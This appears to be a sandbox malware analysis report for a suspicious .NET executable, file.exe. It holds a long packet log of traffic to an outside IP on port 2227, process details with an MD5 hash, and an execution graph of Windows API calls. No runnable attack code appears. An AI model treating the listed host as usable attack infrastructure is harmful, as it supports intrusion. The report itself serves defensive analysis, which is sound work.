                                                Jun 28, 2023 01:59:23.041218996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041218996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041258097 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041259050 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041320086 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041400909 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041444063 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041526079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041539907 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041579962 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041604042 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041615009 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041645050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.041681051 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.041707039 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070357084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070389032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070416927 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070440054 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070502043 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070502043 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070502996 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070532084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070614100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070664883 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070732117 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070741892 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070810080 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070837975 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070863008 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070921898 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.070936918 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.070962906 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071005106 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071053028 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071079016 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071125031 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071125031 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071218014 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071288109 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071289062 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071314096 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071352005 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071377993 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071424961 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071449041 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071489096 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071489096 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071517944 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071522951 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071584940 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071655035 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071731091 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071758032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071821928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.071824074 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.071887016 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072191954 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072228909 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072298050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072304964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072304964 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072323084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072346926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072357893 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072371960 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072400093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072400093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072432995 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072479010 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072550058 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072685957 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072709084 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072767973 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072767973 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.072921038 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.072943926 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073016882 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073016882 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073185921 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073260069 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073287964 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073354959 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.073743105 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.073829889 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074115992 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074191093 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074450970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074521065 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074553967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074613094 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.074850082 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.074932098 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075119972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075145960 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075189114 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075247049 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075414896 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075439930 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075490952 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075490952 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075519085 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075582027 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075627089 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075690985 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.075731039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.075793028 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076035023 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076093912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076100111 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076119900 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076162100 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076189995 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076196909 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076256990 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.076328039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076499939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076602936 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076627970 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076863050 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.076889038 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077073097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077239990 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077321053 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.077446938 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078340054 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078372955 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078397036 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078424931 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078450918 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078481913 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078505039 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078528881 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078553915 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078653097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078670979 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078706026 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078900099 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078917027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078934908 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.078950882 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079034090 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079051971 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079121113 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079142094 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079183102 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079242945 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079298973 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079385996 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079404116 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079596043 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079617977 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079638004 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079658985 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079706907 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079725027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079830885 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.079899073 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080245972 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080281973 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080301046 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080318928 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080334902 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080353022 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080368996 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080466032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080483913 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080543041 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080679893 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080698967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080851078 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.080941916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081131935 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081149101 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081166029 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081607103 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081625938 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081641912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.081710100 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083065033 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083353043 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083487034 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083589077 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083607912 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.083626032 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085180998 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085199118 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085218906 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085235119 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085252047 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085273027 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085319042 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085338116 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085400105 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085419893 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085441113 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085459948 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085481882 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085504055 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085520983 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085541010 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085558891 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085576057 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085647106 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085664034 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085773945 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085797071 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085817099 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085835934 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085859060 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085875988 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085891962 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085969925 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.085990906 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086011887 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086034060 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086051941 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086069107 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086086988 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086103916 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086204052 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086220980 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086361885 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086380005 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086397886 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086415052 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086435080 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086453915 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086469889 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086493969 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086514950 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086530924 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086548090 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086807966 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086826086 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086843967 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086864948 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086893082 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086916924 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086968899 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.086991072 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087013006 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087032080 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087050915 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087070942 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087091923 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087110043 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087126017 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087142944 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087158918 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.087176085 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.107726097 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.107752085 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.108047962 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.108186007 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.108603954 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.108943939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109082937 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109246969 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109286070 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109339952 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109406948 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109522104 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109684944 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109715939 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.109817982 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110004902 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110229015 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110261917 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110346079 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110423088 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110454082 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110624075 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110721111 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110774994 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110879898 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.110992908 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111169100 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111345053 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111488104 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111573935 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111725092 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.111963034 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112273932 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112353086 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112534046 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112639904 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112673998 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112746000 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.112772942 CEST496922227192.168.2.489.238.170.240
                                                Jun 28, 2023 01:59:23.112848043 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.114123106 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.150048971 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.150186062 CEST22274969289.238.170.240192.168.2.4
                                                Jun 28, 2023 01:59:23.150352001 CEST496922227192.168.2.489.238.170.240

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:01:58:58
                                                Start date:28/06/2023
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\file.exe
                                                Imagebase:0x6f0000
                                                File size:535'040 bytes
                                                MD5 hash:CCBBA2AAC1CAE3A0BD29CB42203E20B4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:low

                                                General

                                                Target ID:3
                                                Start time:01:59:06
                                                Start date:28/06/2023
                                                Path:C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\file.exe
                                                Imagebase:0x8d0000
                                                File size:535'040 bytes
                                                MD5 hash:CCBBA2AAC1CAE3A0BD29CB42203E20B4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:10.8%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:115
                                                  Total number of Limit Nodes:4
                                                  execution_graph 16379 2a940d0 16380 2a940e2 16379->16380 16381 2a940ee 16380->16381 16385 2a941e0 16380->16385 16390 2a93868 16381->16390 16383 2a9410d 16386 2a94205 16385->16386 16394 2a942e0 16386->16394 16398 2a942d0 16386->16398 16391 2a93873 16390->16391 16406 2a957f4 16391->16406 16393 2a96ab1 16393->16383 16396 2a94307 16394->16396 16395 2a943e4 16396->16395 16402 2a938a8 16396->16402 16400 2a94307 16398->16400 16399 2a943e4 16399->16399 16400->16399 16401 2a938a8 CreateActCtxA 16400->16401 16401->16399 16403 2a95370 CreateActCtxA 16402->16403 16405 2a95433 16403->16405 16407 2a957ff 16406->16407 16410 2a95814 16407->16410 16409 2a96b5d 16409->16393 16411 2a9581f 16410->16411 16414 2a95844 16411->16414 16413 2a96c3a 16413->16409 16415 2a9584f 16414->16415 16418 2a95874 16415->16418 16417 2a96d2a 16417->16413 16419 2a9587f 16418->16419 16421 2a9743e 16419->16421 16425 2a991f9 16419->16425 16420 2a9747c 16420->16417 16421->16420 16429 2a9b360 16421->16429 16434 2a9b350 16421->16434 16439 2a9921f 16425->16439 16444 2a99230 16425->16444 16426 2a9920e 16426->16421 16430 2a9b381 16429->16430 16431 2a9b3a5 16430->16431 16476 2a9b618 16430->16476 16480 2a9b607 16430->16480 16431->16420 16435 2a9b381 16434->16435 16436 2a9b3a5 16435->16436 16437 2a9b618 4 API calls 16435->16437 16438 2a9b607 4 API calls 16435->16438 16436->16420 16437->16436 16438->16436 16440 2a99230 16439->16440 16448 2a99721 16440->16448 16456 2a99730 16440->16456 16441 2a9923f 16441->16426 16446 2a99721 2 API calls 16444->16446 16447 2a99730 2 API calls 16444->16447 16445 2a9923f 16445->16426 16446->16445 16447->16445 16449 2a99743 16448->16449 16450 2a9975b 16449->16450 16464 2a999b8 16449->16464 16468 2a999ab 16449->16468 16450->16441 16451 2a99753 16451->16450 16452 2a99958 GetModuleHandleW 16451->16452 16453 2a99985 16452->16453 16453->16441 16457 2a99743 16456->16457 16459 2a9975b 16457->16459 16462 2a999b8 LoadLibraryExW 16457->16462 16463 2a999ab LoadLibraryExW 16457->16463 16458 2a99753 16458->16459 16460 2a99958 GetModuleHandleW 16458->16460 16459->16441 16461 2a99985 16460->16461 16461->16441 16462->16458 16463->16458 16465 2a999cc 16464->16465 16467 2a999f1 16465->16467 16472 2a99348 16465->16472 16467->16451 16469 2a999cc 16468->16469 16470 2a999f1 16469->16470 16471 2a99348 LoadLibraryExW 16469->16471 16470->16451 16471->16470 16473 2a99b98 LoadLibraryExW 16472->16473 16475 2a99c11 16473->16475 16475->16467 16477 2a9b625 16476->16477 16479 2a9b65f 16477->16479 16484 2a99648 16477->16484 16479->16431 16481 2a9b625 16480->16481 